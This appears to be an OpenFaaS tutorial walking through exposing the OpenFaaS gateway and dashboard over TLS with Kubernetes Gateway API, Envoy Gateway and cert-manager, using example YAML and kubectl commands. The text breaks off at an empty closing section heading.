<h2 id="introduction-to-gateway-api">Introduction to Gateway API</h2>

<p><a href="https://gateway-api.sigs.k8s.io/">Kubernetes Gateway API</a> is an add-on to Kubernetes, which:</p>

<ul>
  <li>Aims to abstract vendor implementations under one set of APIs</li>
  <li>Acts as an add-on, rather than a native feature</li>
  <li>Attempts to split the roles of cluster administrator and application developer through different resources</li>
  <li>Covers the main use-cases of Ingress Controllers, such as TLS termination, path-based routing, and load balancing</li>
</ul>

<p>From the perspective of OpenFaaS, there are three Gateway API resources we need:</p>

<ul>
  <li><strong>GatewayClass</strong> - maps to IngressClass - i.e. whether you’re using Kgateway, Istio, Envoy Gateway, or another implementation.</li>
  <li><strong>Gateway</strong> - maps to a LoadBalancer Service with one or more listeners and handles TLS configuration.</li>
  <li><strong>HTTPRoute</strong> - binds paths and/or hostnames to backend services.</li>
</ul>

<p>This separation means that a cluster operator can manage TLS termination and listener configuration in a Gateway, while application teams define routing via HTTPRoute resources. It also means that the same configuration works across <a href="https://gateway-api.sigs.k8s.io/implementations/#conformant">many conformant implementations</a> including Envoy Gateway, Traefik, NGINX Gateway Fabric, and Istio.</p>

<p>The <code class="language-plaintext highlighter-rouge">openfaas</code> chart has built-in support to generate Ingress objects. Once we have enough feedback from customers, we’ll know if and how you want us to add support for Gateway API resources into the chart. For now, this guide shows how to create the resources through manual YAML files, which we think is more useful for building understanding.</p>

<p>We’ll install a Gateway API implementation, configure cert-manager, and then define a Gateway and HTTPRoute for both the OpenFaaS Gateway and the Dashboard.</p>

<p>For any of the YAML examples, you can either save the snippet to a file and run <code class="language-plaintext highlighter-rouge">kubectl apply -f ./name.yaml</code>, or run <code class="language-plaintext highlighter-rouge">kubectl apply -f -</code>, paste in the snippet directly, press Enter, then Control + D.</p>
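
<p>The latter approach can also be scripted non-interactively with a heredoc (the Namespace below is just a throwaway illustration):</p>

```bash
# Pipe a snippet into kubectl without creating a file first
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: yaml-demo
EOF
```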

<h2 id="prerequisites">Prerequisites</h2>

<ul>
  <li>A Kubernetes cluster with OpenFaaS installed via Helm</li>
  <li>A domain name with the ability to create DNS records</li>
  <li>A public IP address or load balancer (i.e. EKS, GKE, or AKS), or <a href="https://github.com/inlets/inlets-operator">inlets-operator</a> which does the same for any private or NAT’d or firewalled Kubernetes cluster</li>
</ul>

<h2 id="check-and-update-gateway-api-crds">Check and update Gateway API CRDs</h2>

<p>Some Kubernetes distributions ship their own version of the Gateway API CRDs, which may not match those your implementation wants to use.</p>

<p>Check with:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get crd | <span class="nb">grep </span>gateway.networking.k8s.io

backendtlspolicies.gateway.networking.k8s.io          2026-02-13T15:06:49Z
gatewayclasses.gateway.networking.k8s.io              2026-02-13T15:06:49Z
gateways.gateway.networking.k8s.io                    2026-02-13T15:06:49Z
grpcroutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
httproutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
referencegrants.gateway.networking.k8s.io             2026-02-13T15:06:49Z
tcproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
tlsroutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
udproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
</code></pre></div></div>

<p>For this example, it’s best to let Envoy Gateway handle the CRD installation with versions it supports, so remove all CRDs that may be preloaded in your cluster:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># example: replace v1.1.0 with the version installed in your cluster</span>
kubectl delete <span class="nt">-f</span> https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/standard-install.yaml
kubectl delete <span class="nt">-f</span> https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/experimental-install.yaml
</code></pre></div></div>
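
<p>Once deleted, the check from above should come back empty. A quick sketch to confirm before moving on:</p>

```bash
# Expect "No Gateway API CRDs found" once all of the CRDs have been removed
kubectl get crd | grep gateway.networking.k8s.io || echo "No Gateway API CRDs found"
```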

<h2 id="install-a-gateway-api-implementation">Install a Gateway API Implementation</h2>

<p>Early feedback from customers suggests that <a href="https://gateway.envoyproxy.io/">Envoy Gateway</a> may well end up being the equivalent of “ingress-nginx” in the Gateway API world. It is one of the many <a href="https://gateway-api.sigs.k8s.io/implementations/#conformant">conformant implementations</a>.</p>

<blockquote>
  <p><code class="language-plaintext highlighter-rouge">gatewayClassName</code> is similar to the old <code class="language-plaintext highlighter-rouge">ingressClassName</code> in the Ingress API. It is a string that identifies the Gateway API implementation that should be used to manage the Gateway and HTTPRoute resources. So if you want to use a different implementation, just change the <code class="language-plaintext highlighter-rouge">gatewayClassName</code> in any examples and install it using its documentation, instead of that of Envoy Gateway.</p>

  <p>Watch out for this gotcha: many tools such as cert-manager, may require additional settings or flags to turn on Gateway API support.</p>
</blockquote>

<p>Install Envoy Gateway using <a href="https://gateway.envoyproxy.io/docs/install/install-helm/#install-with-helm">its Helm chart</a>. The chart includes the Gateway API CRDs, so no separate CRD installation is needed.</p>

<p>Bear in mind that Envoy Gateway maintains its own <a href="https://gateway.envoyproxy.io/news/releases/matrix/">compatibility matrix</a>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm <span class="nb">install </span>eg oci://docker.io/envoyproxy/gateway-helm <span class="se">\</span>
  <span class="nt">--version</span> v1.7.0 <span class="se">\</span>
  <span class="nt">-n</span> envoy-gateway-system <span class="se">\</span>
  <span class="nt">--create-namespace</span>
</code></pre></div></div>

<p>Since this post will be read for some time to come, you can find newer versions of the chart by running <code class="language-plaintext highlighter-rouge">arkade get crane</code>, then <code class="language-plaintext highlighter-rouge">crane ls envoyproxy/gateway-helm</code>. See also: <a href="https://github.com/alexellis/arkade">arkade</a>.</p>

<p>Wait for Envoy Gateway to become available:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl <span class="nb">wait</span> <span class="nt">--timeout</span><span class="o">=</span>5m <span class="nt">-n</span> envoy-gateway-system <span class="se">\</span>
  deployment/envoy-gateway <span class="nt">--for</span><span class="o">=</span><span class="nv">condition</span><span class="o">=</span>Available
</code></pre></div></div>

<p>Create a <code class="language-plaintext highlighter-rouge">GatewayClass</code> so that <code class="language-plaintext highlighter-rouge">Gateway</code> resources can reference the Envoy Gateway controller. The usual name is <code class="language-plaintext highlighter-rouge">eg</code>, short for Envoy Gateway.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">GatewayClass</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">eg</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">controllerName</span><span class="pi">:</span> <span class="s">gateway.envoyproxy.io/gatewayclass-controller</span>
</code></pre></div></div>

<p>Verify that the GatewayClass is accepted:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get gatewayclass

NAME    CONTROLLER                                      ACCEPTED
eg      gateway.envoyproxy.io/gatewayclass-controller    True
</code></pre></div></div>

<h2 id="install-cert-manager">Install cert-manager</h2>

<p><a href="https://cert-manager.io">cert-manager</a> automates TLS certificate management in Kubernetes. It integrates with the Gateway API to automatically create certificates for Gateway listeners.</p>

<p>Install cert-manager with Gateway API support enabled:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm upgrade <span class="nt">--install</span> cert-manager oci://quay.io/jetstack/charts/cert-manager <span class="se">\</span>
  <span class="nt">--namespace</span> cert-manager <span class="se">\</span>
  <span class="nt">--create-namespace</span> <span class="se">\</span>
  <span class="nt">--version</span> v1.19.3 <span class="se">\</span>
  <span class="nt">--set</span> crds.enabled<span class="o">=</span><span class="nb">true</span> <span class="se">\</span>
  <span class="nt">--set</span> config.apiVersion<span class="o">=</span><span class="s2">"controller.config.cert-manager.io/v1alpha1"</span> <span class="se">\</span>
  <span class="nt">--set</span> config.kind<span class="o">=</span><span class="s2">"ControllerConfiguration"</span> <span class="se">\</span>
  <span class="nt">--set</span> config.enableGatewayAPI<span class="o">=</span><span class="nb">true</span>
</code></pre></div></div>
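
<p>Before creating any Issuers, it’s worth waiting for cert-manager to become ready. A sketch, assuming the chart’s default deployment names:</p>

```bash
# The chart installs three deployments: controller, webhook and cainjector
kubectl rollout status -n cert-manager deploy/cert-manager --timeout=5m
kubectl rollout status -n cert-manager deploy/cert-manager-webhook --timeout=5m
kubectl rollout status -n cert-manager deploy/cert-manager-cainjector --timeout=5m
```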

<p>You can run <code class="language-plaintext highlighter-rouge">crane ls quay.io/jetstack/charts/cert-manager</code> to see alternative versions.</p>

<blockquote>
  <p>Note: The Gateway API CRDs must be installed before cert-manager starts.
If you installed them after cert-manager, restart the controller with: <code class="language-plaintext highlighter-rouge">kubectl rollout restart deployment cert-manager -n cert-manager</code></p>
</blockquote>

<h2 id="create-a-cert-manager-issuer">Create a cert-manager Issuer</h2>

<p>Create an Issuer in the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace that uses Let’s Encrypt with an HTTP-01 challenge. cert-manager will use this Issuer to automatically obtain certificates for any Gateway listener that references it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">cert-manager.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Issuer</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">acme</span><span class="pi">:</span>
    <span class="na">server</span><span class="pi">:</span> <span class="s">https://acme-v02.api.letsencrypt.org/directory</span>
    <span class="na">privateKeySecretRef</span><span class="pi">:</span>
      <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-prod-account-key</span>
    <span class="na">solvers</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">http01</span><span class="pi">:</span>
        <span class="na">gatewayHTTPRoute</span><span class="pi">:</span>
          <span class="na">parentRefs</span><span class="pi">:</span>
          <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
            <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
            <span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
</code></pre></div></div>

<p>Notice that the solver uses a <a href="https://cert-manager.io/docs/configuration/acme/http01/#configuring-the-http-01-gateway-api-solver"><code class="language-plaintext highlighter-rouge">gatewayHTTPRoute</code></a> instead of the <code class="language-plaintext highlighter-rouge">ingress</code> class used in a traditional Ingress-based setup. This tells cert-manager to create a temporary HTTPRoute attached to a Gateway to solve the ACME HTTP-01 challenge.</p>

<p>The <code class="language-plaintext highlighter-rouge">parentRefs</code> field points to the Gateway we’ll create in the next step, so cert-manager knows which Gateway to attach the challenge route to. The referenced Gateway must have a listener on port 80, since the HTTP-01 challenge requires Let’s Encrypt to reach a well-known URL over plain HTTP. In our setup, we will include this HTTP listener directly on the same Gateway that serves HTTPS traffic. Alternatively, the Issuer could reference a separate Gateway created specifically for solving HTTP-01 challenges, as long as that Gateway has a port 80 listener.</p>

<p>If you’re setting this up for the first time, consider using the staging issuer to avoid rate limits. Change the server URL to <code class="language-plaintext highlighter-rouge">https://acme-staging-v02.api.letsencrypt.org/directory</code> and the issuer name to <code class="language-plaintext highlighter-rouge">letsencrypt-staging</code>.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">cert-manager.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Issuer</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-staging</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">acme</span><span class="pi">:</span>
    <span class="na">server</span><span class="pi">:</span> <span class="s">https://acme-staging-v02.api.letsencrypt.org/directory</span>
    <span class="na">privateKeySecretRef</span><span class="pi">:</span>
      <span class="na">name</span><span class="pi">:</span> <span class="s">letsencrypt-staging-account-key</span>
    <span class="na">solvers</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">http01</span><span class="pi">:</span>
        <span class="na">gatewayHTTPRoute</span><span class="pi">:</span>
          <span class="na">parentRefs</span><span class="pi">:</span>
          <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
            <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
            <span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
</code></pre></div></div>
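
<p>After applying one or both Issuers, check that they have registered an account with the ACME server. READY should show True within a few seconds:</p>

```bash
# Registration does not depend on the Gateway, which we create in the next step
kubectl get issuers -n openfaas
```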

<h2 id="expose-the-openfaas-gateway-with-tls">Expose the OpenFaaS gateway with TLS</h2>

<h3 id="create-the-gateway-object">Create the Gateway object</h3>

<p>The Gateway (API Gateway, not OpenFaaS Gateway) resource defines a LoadBalancer with listeners for your domains. When a Gateway is created, the referenced GatewayClass controller provisions or configures the underlying load balancing infrastructure. The <code class="language-plaintext highlighter-rouge">gatewayClassName</code> field is required and must reference an existing GatewayClass - in our case the <code class="language-plaintext highlighter-rouge">eg</code> GatewayClass we created earlier for Envoy Gateway.</p>

<p>Start with a single HTTPS listener for the OpenFaaS gateway:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">annotations</span><span class="pi">:</span>
    <span class="na">cert-manager.io/issuer</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">gatewayClassName</span><span class="pi">:</span> <span class="s">eg</span>
  <span class="na">listeners</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">http</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">80</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTP</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway-cert</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">cert-manager.io/issuer</code> annotation tells cert-manager to watch this Gateway and automatically create a Certificate resource for each HTTPS listener. The certificate will be stored in the Secret referenced by <code class="language-plaintext highlighter-rouge">certificateRefs</code>.</p>

<p>The first listener on port 80 is the HTTP listener referenced by the Issuer we created earlier to resolve HTTP-01 challenges.</p>

<p>The second listener serves HTTPS traffic for <code class="language-plaintext highlighter-rouge">gw.example.com</code> on port 443. The <code class="language-plaintext highlighter-rouge">tls.mode: Terminate</code> setting means TLS is terminated at the Gateway and traffic is forwarded to the backend as plain HTTP. The <code class="language-plaintext highlighter-rouge">certificateRefs</code> field references the Secret where cert-manager will store the issued certificate.</p>

<h3 id="create-the-dns-record">Create the DNS record</h3>

<p>Find the external IP address assigned to the Gateway:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get gateway <span class="nt">-n</span> openfaas openfaas-gateway

NAME               CLASS   ADDRESS          PROGRAMMED
openfaas-gateway   eg      203.0.113.10     True
</code></pre></div></div>

<p>Create an A record (or CNAME if you see a hostname) in your DNS provider pointing <code class="language-plaintext highlighter-rouge">gw.example.com</code> to this address.</p>
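
<p>You can confirm the record has propagated with a quick lookup (<code class="language-plaintext highlighter-rouge">gw.example.com</code> stands in for your own domain):</p>

```bash
# Should print the Gateway's external address, e.g. 203.0.113.10
dig +short gw.example.com
```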

<h3 id="verify-the-certificate">Verify the certificate</h3>

<p>Check that cert-manager has issued the certificate. Note that it might take a while for DNS to propagate and the certificate to become ready.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get certificate <span class="nt">-n</span> openfaas

NAME                     READY   SECRET                   AGE
openfaas-gateway-cert    True    openfaas-gateway-cert    2m
</code></pre></div></div>

<p>If the certificate doesn’t show Ready as True, check the logs of cert-manager’s controller, and inspect its various Custom Resources.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl logs <span class="nt">-n</span> cert-manager deploy/cert-manager
</code></pre></div></div>

<p>Use either the <code class="language-plaintext highlighter-rouge">get</code> or <code class="language-plaintext highlighter-rouge">describe</code> verb for more information about the resources.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get certificaterequests <span class="nt">-n</span> openfaas
kubectl get issuers <span class="nt">-n</span> openfaas
kubectl get orders <span class="nt">-n</span> openfaas
kubectl get challenges <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="create-the-httproute">Create the HTTPRoute</h3>

<p>While the Gateway defines listeners and TLS termination, it is the HTTPRoute that binds hostnames and paths to backend services.</p>

<p>Create an HTTPRoute that routes traffic from the Gateway to the OpenFaaS gateway service:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">parentRefs</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">hostnames</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
  <span class="na">rules</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">matches</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span>
        <span class="na">type</span><span class="pi">:</span> <span class="s">PathPrefix</span>
        <span class="na">value</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">timeouts</span><span class="pi">:</span>
      <span class="c1"># Should match gateway.writeTimeout in the OpenFaaS Helm chart.</span>
      <span class="c1"># Envoy's default of 15s is too short for most functions.</span>
      <span class="na">request</span><span class="pi">:</span> <span class="s">10m</span>
    <span class="na">backendRefs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
      <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">timeouts.request</code> field sets the maximum duration for the gateway to respond to an HTTP request. This value should be set to match the <code class="language-plaintext highlighter-rouge">gateway.writeTimeout</code> configured in the OpenFaaS Helm chart. If omitted, Envoy Proxy uses a default of 15 seconds which will cause functions with longer execution times to time out at the proxy level. See the <a href="https://docs.openfaas.com/tutorials/expanded-timeouts/">expanded timeouts guide</a> for details on configuring all timeout values.</p>
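
<p>If you’re not sure what your installation uses, one way to check is via Helm (a sketch, assuming your release is named <code class="language-plaintext highlighter-rouge">openfaas</code> in the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace):</p>

```bash
# Show the effective timeout settings for the openfaas Helm release,
# including chart defaults (--all)
helm get values --all -n openfaas openfaas | grep -i timeout
```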

<p>The <code class="language-plaintext highlighter-rouge">parentRefs</code> field defines which Gateway this route wants to be attached to, in this case the <code class="language-plaintext highlighter-rouge">openfaas-gateway</code> Gateway. The <code class="language-plaintext highlighter-rouge">hostnames</code> field filters requests by the Host header before rules are evaluated, ensuring only requests for <code class="language-plaintext highlighter-rouge">gw.example.com</code> are matched. The <code class="language-plaintext highlighter-rouge">backendRefs</code> field defines the backend service where matching requests are forwarded - in this case the OpenFaaS <code class="language-plaintext highlighter-rouge">gateway</code> service on port 8080.</p>
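
<p>If DNS hasn’t propagated yet, you can still exercise the route by pinning the hostname to the Gateway’s external IP. A sketch using the example address from earlier; <code class="language-plaintext highlighter-rouge">-k</code> skips TLS verification in case the certificate hasn’t been issued yet:</p>

```bash
# The OpenFaaS gateway's /healthz endpoint should return HTTP 200
curl -sk -i --resolve gw.example.com:443:203.0.113.10 https://gw.example.com/healthz
```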

<h3 id="attempt-to-reach-a-function">Attempt to reach a function</h3>

<p>Using <code class="language-plaintext highlighter-rouge">kubectl</code>, we can deploy a function from the OpenFaaS store and invoke it via curl.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli generate <span class="nt">--from-store</span> <span class="nb">env</span> | kubectl apply <span class="nt">-f</span> -

curl <span class="nt">-i</span> https://gw.example.com/function/env
</code></pre></div></div>

<h3 id="log-in-to-openfaas">Log in to OpenFaaS</h3>

<p>Once the certificate is issued and DNS has propagated, you can log in and use OpenFaaS as you normally would through Ingress.</p>

<p>For instance, if you’re not using IAM for OpenFaaS, you can simply run:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">OPENFAAS_URL</span><span class="o">=</span>https://gw.example.com

<span class="nv">PASSWORD</span><span class="o">=</span><span class="si">$(</span>kubectl get secret <span class="nt">-n</span> openfaas basic-auth <span class="se">\</span>
  <span class="nt">-o</span> <span class="nv">jsonpath</span><span class="o">=</span><span class="s2">"{.data.basic-auth-password}"</span> | <span class="nb">base64</span> <span class="nt">--decode</span><span class="p">;</span> <span class="nb">echo</span><span class="si">)</span>
<span class="nb">echo</span> <span class="nt">-n</span> <span class="nv">$PASSWORD</span> | faas-cli login <span class="nt">--username</span> admin <span class="nt">--password-stdin</span>

faas-cli list
</code></pre></div></div>

<h2 id="add-the-openfaas-dashboard">Add the OpenFaaS dashboard</h2>

<p>The <a href="https://docs.openfaas.com/openfaas-pro/dashboard/">OpenFaaS Dashboard</a> is an essential add-on for OpenFaaS Standard and OpenFaaS for Enterprises.</p>

<p>This is where we start to see some of the differences between Gateway API and Ingress.</p>

<p>With Ingress, the Ingress Controller has one IP, and routes all traffic to hosts and paths defined on Ingress records.</p>

<p>With Gateway API, there are two objects to update, maintain, and keep in sync: both the Gateway and the HTTPRoute must include the desired hostname, e.g. <code class="language-plaintext highlighter-rouge">dashboard.example.com</code>.</p>

<h3 id="add-a-listener-to-the-gateway">Add a listener to the Gateway</h3>

<p>Add a second HTTPS listener for the dashboard domain to the existing Gateway:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">Gateway</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">annotations</span><span class="pi">:</span>
    <span class="na">cert-manager.io/issuer</span><span class="pi">:</span> <span class="s">letsencrypt-prod</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">gatewayClassName</span><span class="pi">:</span> <span class="s">eg</span>
  <span class="na">listeners</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">http</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">80</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTP</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">gateway</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">gw.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway-cert</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">dashboard</span>
    <span class="na">hostname</span><span class="pi">:</span> <span class="s2">"</span><span class="s">dashboard.example.com"</span>
    <span class="na">port</span><span class="pi">:</span> <span class="m">443</span>
    <span class="na">protocol</span><span class="pi">:</span> <span class="s">HTTPS</span>
    <span class="na">allowedRoutes</span><span class="pi">:</span>
      <span class="na">namespaces</span><span class="pi">:</span>
        <span class="na">from</span><span class="pi">:</span> <span class="s">Same</span>
    <span class="na">tls</span><span class="pi">:</span>
      <span class="na">mode</span><span class="pi">:</span> <span class="s">Terminate</span>
      <span class="na">certificateRefs</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-dashboard-cert</span>
</code></pre></div></div>

<p>cert-manager will detect the new HTTPS listener and automatically create a second Certificate for the dashboard domain.</p>

<h3 id="create-the-dns-record-for-the-dashboard">Create the DNS record for the dashboard</h3>

<p>Create an A or CNAME record for <code class="language-plaintext highlighter-rouge">dashboard.example.com</code> pointing to the same external IP as the Gateway.</p>
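<p>Before moving on, you may want to confirm that both hostnames resolve to the Gateway's external address. A quick sketch using <code class="language-plaintext highlighter-rouge">kubectl</code> and <code class="language-plaintext highlighter-rouge">dig</code> (substitute your own domains):</p>

```shell
# Print the external address assigned to the Gateway
kubectl get gateway -n openfaas openfaas-gateway \
  -o jsonpath='{.status.addresses[0].value}'; echo

# Both hostnames should resolve to that same address
dig +short gw.example.com
dig +short dashboard.example.com
```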

<p>Verify both certificates are ready:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get certificate <span class="nt">-n</span> openfaas

NAME                      READY   SECRET                    AGE
openfaas-gateway-cert     True    openfaas-gateway-cert     10m
openfaas-dashboard-cert   True    openfaas-dashboard-cert   2m
</code></pre></div></div>

<p>Note that it may take a while for DNS to propagate and for the certificate to become ready.</p>

<h3 id="create-the-httproute-for-the-dashboard">Create the HTTPRoute for the dashboard</h3>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">gateway.networking.k8s.io/v1</span>
<span class="na">kind</span><span class="pi">:</span> <span class="s">HTTPRoute</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-dashboard</span>
  <span class="na">namespace</span><span class="pi">:</span> <span class="s">openfaas</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">parentRefs</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas-gateway</span>
  <span class="na">hostnames</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s2">"</span><span class="s">dashboard.example.com"</span>
  <span class="na">rules</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">matches</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span>
        <span class="na">type</span><span class="pi">:</span> <span class="s">PathPrefix</span>
        <span class="na">value</span><span class="pi">:</span> <span class="s">/</span>
    <span class="na">timeouts</span><span class="pi">:</span>
      <span class="c1"># Should match gateway.writeTimeout in the OpenFaaS Helm chart.</span>
      <span class="c1"># Envoy's default of 15s is too short for most functions.</span>
      <span class="na">request</span><span class="pi">:</span> <span class="s">10m</span>
    <span class="na">backendRefs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">dashboard</span>
      <span class="na">port</span><span class="pi">:</span> <span class="m">8080</span>
</code></pre></div></div>

<p>You should now be able to access the dashboard at <code class="language-plaintext highlighter-rouge">https://dashboard.example.com</code>.</p>

<p>That concludes the walk-through.</p>

<h2 id="final-thoughts-and-next-steps">Final thoughts and next steps</h2>

